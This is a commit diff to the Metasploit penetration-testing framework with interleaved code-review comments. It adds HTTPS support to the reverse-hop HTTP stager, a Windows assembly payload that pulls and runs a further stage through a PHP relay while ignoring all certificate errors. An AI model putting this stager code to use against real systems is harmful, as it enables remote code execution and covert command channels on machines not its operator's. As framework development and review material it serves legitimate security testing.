
Commit 5654b6b

author
Brent Cook
committed
Land rapid7#6227, reverse_hop_http updates and HTTPS unification
2 parents 25f2241 + 8703987 commit 5654b6b


4 files changed

+75
-14
lines changed


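--- a/data/php/hop.php
+++ b/data/php/hop.php
@@ -45,7 +45,7 @@ function findSendDelete($tempdir, $prefix, $one=true){
 //get data
 $postdata = file_get_contents("php://input");
 //See if we should send anything down
-if($postdata === "RECV\x00"){
+if($postdata === "RECV\x00" || $postdata === "RECV"){
 findSendDelete($tempdir, "down_" . sha1($url));
 $fname = $tempdir . "/up_recv_" . sha1($url); //Only keep one RECV poll
 }else{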
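Review bot: The widened comparison on the changed line now treats a bare `RECV` body the same as `RECV\x00`, but nothing in the hunk records which sender omits the NUL, so a later maintainer cannot tell whether the second form is required or could be dropped again. A one-line comment above the `if`, e.g. `// RECV\x00 comes from the handler; a bare RECV from the stager (verify against both senders)`, would pin that down; I am inferring the split from the rest of this commit, so confirm it before wording the comment. Whichever form is accepted, the poll is gated only by knowledge of `$url`, so this is a compatibility change rather than a security boundary. The enclosing request-handling code begins above the hunk.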

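--- a/lib/msf/core/handler/reverse_hop_http.rb
+++ b/lib/msf/core/handler/reverse_hop_http.rb
@@ -82,7 +82,8 @@ def start_handler
 uri.port,
 {
 'Msf' => framework
-}
+},
+full_uri.start_with?('https')
 )
 @running = true # So we know we can stop it
 # If someone is already monitoring this hop, bump the refcount instead of starting a new thread
@@ -185,6 +186,19 @@ def remove_resource(res)
 lock.unlock
 end
 
+#
+# Implemented for compatibility reasons
+#
+def resources
+handlers
+end
+
+#
+# Implemented for compatibility reasons, does nothing
+#
+def deref
+end
+
 #
 # Implemented for compatibility reasons, does nothing
 #
@@ -250,19 +264,22 @@ def initialize(info = {})
 #
 def send_new_stage(uri)
 # try to get the UUID out of the existing URI
-info = process_uri_resource(uri)
+info = process_uri_resource(uri.to_s)
 uuid = info[:uuid] || Msf::Payload::UUID.new
 
 # generate a new connect
 sum = uri_checksum_lookup(:connect)
 conn_id = generate_uri_uuid(sum, uuid)
 conn_id = conn_id[1..-1] if conn_id.start_with? '/'
 url = full_uri + conn_id + "/\x00"
+fulluri = URI(full_uri + conn_id)
 
 print_status("Preparing stage for next session #{conn_id}")
 blob = stage_payload(
 uuid: uuid,
-uri: fulluri.request_uri,
+uri: fulluri.request_uri,
+lhost: uri.host,
+lport: uri.port
 )
 
 #send up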
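Review bot: The TLS switch added in the first hunk, `full_uri.start_with?('https')`, is a prefix test on the raw string rather than a scheme check, and it is evaluated right after `uri.port` shows a parsed URI is already in hand; `uri.scheme == 'https'` would be exact and would match the stager module, which branches on `uri.scheme`. As written, a hop URL entered as `HTTPS://...` (or anything else that does not begin with the lowercase prefix) appears to get a plaintext listener, and nothing warns the operator. A case-insensitive form, `uri.scheme.to_s.casecmp('https').zero?`, covers both. start_handler begins outside the hunk.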

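--- a/lib/msf/core/payload/transport_config.rb
+++ b/lib/msf/core/payload/transport_config.rb
@@ -55,8 +55,8 @@ def transport_config_reverse_http(opts={})
 
 {
 :scheme => 'http',
-:lhost => opts[:lhost],
-:lport => opts[:lport].to_i,
+:lhost => opts[:lhost] || datastore['LHOST'],
+:lport => opts[:lport].to_i || datastore['LPORT'].to_i,
 :uri => uri,
 :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
 :retry_total => datastore['SessionRetryTotal'].to_i,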
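Review bot: The `:lport` fallback on the new line can never fire: when `opts[:lport]` is absent, `nil.to_i` is `0`, and `0` is truthy in Ruby, so the `||` branch is dead and the transport config carries port 0 instead of `datastore['LPORT']`. The `:lhost` line works because `nil || x` is evaluated before any coercion; apply the same shape to the port, `:lport => (opts[:lport] || datastore['LPORT']).to_i,`. Whether any caller actually relies on the datastore fallback for the port is not visible here, but the intent of the line is clearly that it should. transport_config_reverse_http begins outside the hunk.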

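--- a/modules/payloads/stagers/windows/reverse_hop_http.rb
+++ b/modules/payloads/stagers/windows/reverse_hop_http.rb
@@ -16,13 +16,14 @@ module Metasploit3
 
 def initialize(info = {})
 super(merge_info(info,
-'Name' => 'Reverse Hop HTTP Stager',
+'Name' => 'Reverse Hop HTTP/HTTPS Stager',
 'Description' => %q{
-Tunnel communication over an HTTP hop point. Note that you must first upload
+Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload
 data/hop/hop.php to the PHP server you wish to use as a hop.
 },
 'Author' => [
 'scriptjunkie <scriptjunkie[at]scriptjunkie.us>',
+'bannedit',
 'hdm'
 ],
 'License' => MSF_LICENSE,
@@ -48,6 +49,15 @@ def stage_over_connection?
 false
 end
 
+#
+# Generate the transport-specific configuration
+#
+def transport_config(opts={})
+config = transport_config_reverse_http(opts)
+config[:scheme] = URI(datastore['HOPURL']).scheme
+config
+end
+
 #
 # Generate the first stage
 #
@@ -188,12 +198,24 @@ def generate
 pop ecx
 xor edx, edx ; NULL
 push edx ; dwContext (NULL)
-push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags
-;0x80000000 | ; INTERNET_FLAG_RELOAD
-;0x04000000 | ; INTERNET_NO_CACHE_WRITE
-;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
-;0x00000200 | ; INTERNET_FLAG_NO_UI
-;0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION
+EOS
+
+if uri.scheme == 'http'
+payload_data << ' push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags'
+else
+payload_data << ' push (0x80000000 | 0x00800000 | 0x00001000 | 0x00002000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags'
+end
+# 0x80000000 | ; INTERNET_FLAG_RELOAD
+# 0x00800000 | ; INTERNET_FLAG_SECURE
+# 0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
+# 0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
+# 0x80000000 | ; INTERNET_FLAG_RELOAD
+# 0x04000000 | ; INTERNET_NO_CACHE_WRITE
+# 0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
+# 0x00000200 | ; INTERNET_FLAG_NO_UI
+# 0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION
+payload_data << <<EOS
+
 push edx ; accept types
 push edx ; referrer
 push edx ; version
@@ -223,6 +245,28 @@ def generate
 try_it_again:
 dec ebx
 jz failure
+
+EOS
+if uri.scheme == 'https'
+payload_data << <<EOS
+set_security_options:
+push 0x00003380
+;0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
+;0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
+;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE
+;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
+;0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION
+mov eax, esp
+push 0x04 ; sizeof(dwFlags)
+push eax ; &dwFlags
+push 0x1f ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
+push esi ; hRequest
+push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
+call ebp
+
+EOS
+end
+payload_data << <<EOS
 jmp.i8 httpsendrequest
 
 dbl_get_server_host: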
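Review bot: The HTTPS path switches off every certificate check — INTERNET_FLAG_IGNORE_CERT_CN_INVALID and _DATE_INVALID in dwFlags, then SECURITY_FLAG_IGNORE_UNKNOWN_CA, _IGNORE_REVOCATION and _IGNORE_WRONG_USAGE via InternetSetOptionA — so the stage download is encrypted but the hop is not authenticated, and an on-path attacker can hand the stager a substitute stage. That is the usual trade-off for a size-constrained stager, but the new 'Description' only says "HTTP or HTTPS"; it should state it, e.g. `The HTTPS transport does not validate the hop's certificate and only resists passive observation.`. Two smaller points: the flag comment block repeats `# 0x80000000 | ; INTERNET_FLAG_RELOAD` (new lines 208 and 212), and the `push 0x00003380` that backs `mov eax, esp` is never popped, so because set_security_options sits inside the `try_it_again` loop each retry appears to leave 4 bytes on the stack — bounded by ebx and presumably harmless, but worth a `; dwFlags stays on the stack; retries are bounded` comment. `generate` starts and ends outside these hunks.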
